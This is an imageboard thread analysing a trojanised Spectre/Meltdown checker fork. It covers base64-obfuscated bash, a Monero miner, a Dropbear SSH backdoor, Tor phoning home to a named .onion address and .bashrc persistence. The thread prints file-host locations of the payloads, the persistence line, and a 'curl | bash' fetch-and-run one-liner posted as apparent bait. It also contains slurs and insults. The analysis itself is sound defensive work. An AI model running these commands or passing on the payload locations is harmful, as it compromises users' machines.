If you have executed this script, your computer is fucked

Patched for what?

github.com/speed47/spectre-meltdown-checker/compare/master...gonginnig:master

This is the real mystery user.

So you admit Linux is hard to install?

How?

For Meltdown and Spectre.

You don't need to be competent to install Linux distros. It's easier than installing Windows now.

Competent meaning they realize Windows is shit, not that the installation process is hard

>How?
Because it's not a exploit. You are giving the sudo privilege to do a set of encrypted commands. And it does not exploit spectre.

The only filename it has is the one from the shortened URL, "itxveb". sha256= 183d7c3b55fb82efd45963e0eed3adf33127bcf2f58a0322f51fd4ed49d874ad. I won't upload or link it but it shouldn't be hard to find if you really want.

Good call to grep the strings. No results for "ssh" directly, but sure enough, there's another base64'd bash payload in there. It downloads another binary. I'll investigate. Thanks

The script doesn't actually have anything to do with meltdown/spectre, it just pretends. So yes, you would be compromised regardless.

This script can be completely unrelated to Meltdown and Spectre despite it's supposed intention

>gonginnig/spectre-meltdown-checker
The only site I even see "gonginnig" linked to is Sup Forums, meaning someone from here deliberately advertised it.

(Me)
The script downloads that second binary (actually more than one depending on whether systemd etc are available) and installs them as services.

Virustotal thinks both of these are clean. One of these is ssh related. The other is Tor (!!).

>meltdown image
cool descriptive stylized image
>spectre image(the more intricate exploit)
Gay cartoon ghost...
Guys what the fuck?

What's the base URL of the payload? There might be more goodies on the website found with a quick Google search. I am phoneposting.

It's a semi-popular filesharing site. (Think mediafire/mega, but smaller and which allows direct links).

>The other is Tor (!!)
Wtf? Why? what it does?

Oh well.

there's a fair few places where the instructions to install a program basically consist of "curl programname.com/install.sh | bash" or something of that nature, which then does all the steps for you
it's common enough, and most people can't be arsed to read the script before executing it, and in some cases, the script actually has a big 'ole binary attached to it directly (it's been ages, but I remember a proprietary program for Linux doing that, all the install files were bundled together and the header was a script to separate and install the rest)

would be no effort to make that malicious

it looks like it may also be installing a coin miner

I'm assuming it's to send/receive data to its cnc server untraceably. (Or, similarly, allow untraceable ssh access over tor).

>laugh at linux fags
>test run it just incase
>forgot i had Git for Windows, which can run .sh scripts
>it runs

Shit like this
brew.sh

Maybe "realizing Windows is shit" isn't such an elevated epiphany then, fag.

Those drawings were made by a woman..

go figure...

>most people can't be arsed to read the script before executing it

It's pretty easy to detect when curl is feeding directly to bash, and serve different content with a malicious payload. You can have a script that looks fine if you curl it and view it, but does something totally different if it is being piped into bash.

idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

And yet, it's very easy to run things in a chroot sandbox before you rootkit your main install, retard.
Linux users are to the open source world what Windows users are to the proprietary world.

This.

A BSD user would've never fallen for this.

Hold my beer

The one who made the script was caught within minutes. Fuck off, faggot.

Here is:
my.mixtape.moe

Files are itxveb, mppzcd and vickyj.
Ex: my.mixtape.moe/itxveb
NEVER RUN UNLESS YOU ARE ON VM

We have no idea if someone was just browsing the catalog (so they can't read replies) and clicked the link and decided to run it

Why hasn't his account been banned yet?

I reported it. It would help if others did too, if you happen to have a github account.

Oh yeah, i see, is the file called mppzcd, renamed and moved to ~.system/serviced.
Is executed with this arg:
SOCKSPort 36955
DataDirectory .system/config
HiddenServiceDir /tmp/tmp-xgu
HiddenServicePort 42042 127.0.0.1:42042

Kek. That thread just won't die.

Tons of people probably did. Source: Zelda theme song threads

oof, hope you have recent backups

checked

HOW TO check if you are fucked
Check if the last line of the file ~/.bashrc and ~/.zshrc is:
setsid ~/.system/libexec > /dev/null 2> /dev/null& disown

Don't worry user, the harm is done by way of native Linux binaries (elf). The bash code alone doesn't really do anything interesting or malicious, it's just an obfuscated downloader for those binaries.

kek but can you access it

>yes user, don't worry, your computer is not running botnet, just trust me

I was joking. I'm not THAT dumb.
I did run speed47's spectre-meltdown-checker.sh though to make sure .sh commands didn't run on Windows, and was pretty shocked to find out it did. I'll need to be careful.

also joking

>base64 decryption
Please never say those two words together in a sentence again unless you are saying "base64 is not cryptography". Because base64 is not cryptography

he probably meant obfuscation
easy mix up

># Check for the latest version at:
># github.com/speed47/spectre-meltdown-checker
he didn't change who the script is attributed to so the legit guy is more likely to be blamed

Not pictured: The ethernet cable plugged into his laptop because it's fucking impossible to get wifi working with Linux unless you're using a thinkpad from 2010

Hope this helps

What if he posts it on Sup Forums

True. I should have said "decoding" or "deobfuscation".

Steve Gibson from Security Now podcast recommended this script wtf

I peeked at its strings on the advice of another user and found more binaries, see
(Me)
(Me)

>built on Jan 10 2018with GCC
Le C fag

Yeah, which is why I didn't call him a retard and tell him to kys.

But still, for anyone reading, encoding and encrypting are unrelated topics. GPG is encryption, where data is hidden behind an opaque cipher. Base64 is encoding, where data is plain text in a transparent different alphabet.

The repo in the OP is forked from a legitimate script.

Anyone reporting this repo to github should make this fact clear.

Crypto Miner that phones home with Tor
Pretty good setup, I'm impressed.

k3lwhvy5sl4q5dok.onion is the TOR address it phones home to

Already mentioned it in my report.
I hope that guy gets his ass fucking subpoenaed.

I'm more surprised it doesn't dump everything, a quick and dirty buttcoin miner will be found rapidly

if they're trying to mine bitcoins then they're a /biz/ faggot.

What does the file it curls do anyway? Even though I'm 99.999999% sure I could curl it safely if I don't pipe to bash like the script does I still don't wanna...

github.com/speed47/spectre-meltdown-checker/compare/master...gonginnig:master

this.
a miner is dumb.
they could've made a keylogger and stolen some poor linux users bank information.

Nah nothing will come of this other than it being deleted, the account on github is fresh so he'll have made it through a proxy.

All the more reason to hate fucking cryptopyramiders even harder.

Kys, retard.

Base 64 is encryption. It's just weak encryption.

You're objectively wrong.

Low quality bait, user. Try harder, I'd like a good shit flinging contest

>fork
I was shitting bricks for a moment there, even despite being fairly sure I skimmed through the original before running it to look for shit like that

Is there any software or tools I can run that automatically stop crypto miner?

If it's encryption, it must have an encryption key then. Care to tell me what's the key in this case?

Make one user

>yet again cryptography is used to perpetrate virtual crimes
Why haven't we banned encryption yet?

I can't, that's why I'm asking.
I find it pretty odd considering any pirated program can include a miner in it, and there'd be no way you'd know,especially if that program uses a high amount of cpu by default.

Unless it's like this thing and just driving your CPU to 100% and hoping you won't notice.

(Most linuxfags would notice)

nice find

There'd be no point in running a miner at 100% if you plan on having hundreds of thousands of users with it. More like 10%

Googling for AV's that offer crypto miner protection doesn't yield any results either.

Well I'm telling you what this one does. It drops its turd miner in root's .config if it can and the CPU shoots up to max.

Licucks on suicide watch

Most would indeed, I just found this pearl...

Pretty sure that user is joking

Base 64 is a cipher but it's not encryption

Yeah I checked the source and it downloads some shady ass shit.

>Goes to line 180.

Oh shit, Base64?! Wow, this is definitely not an attempt at some faggy code obfuscation that anyone can decode and figure out!

curl -s ix.io/EbA | bash -

Fucking kek.

>tfw didn't read thread before posting
I just assumed it would be 50 posts of you guys talking about nothing, sorry anons.

fuck you
what did you do?

The purpose of doing it with base64 is probably to stop high time preference morons quickly doing ^f curl or ^f bash and finding the line.

Oh no what ever will I do? It's not like I can be the plug, load up a Windows iso and delete everything.

if you actually ran that just relog/reboot/remove it if you put it in your bashrc or something

Looks like this is just a monero miner. The file that it downloads is the binary for 'xmrig'.

The binary has more base64 embedded.

>It's not like I can be the plug, load up a Windows iso and delete everything.
If nobody made this thread then how'd you know you ever had it?

That's the point.

itxveb seems to download & run a monero miner, also runs yet another script encoded with base64 (jesus fucking christ)

vickyj is a dropbear ssh binary, contains an ssh-rsa public key

mppzcd is a tor binary

probably does more, just some quick analysis of the strings

>dISOWN
>>>>DISOWN
>>DISOWN
BEING THIS RETARDED

I'm the owner of Mixtape, I just removed these files from access just now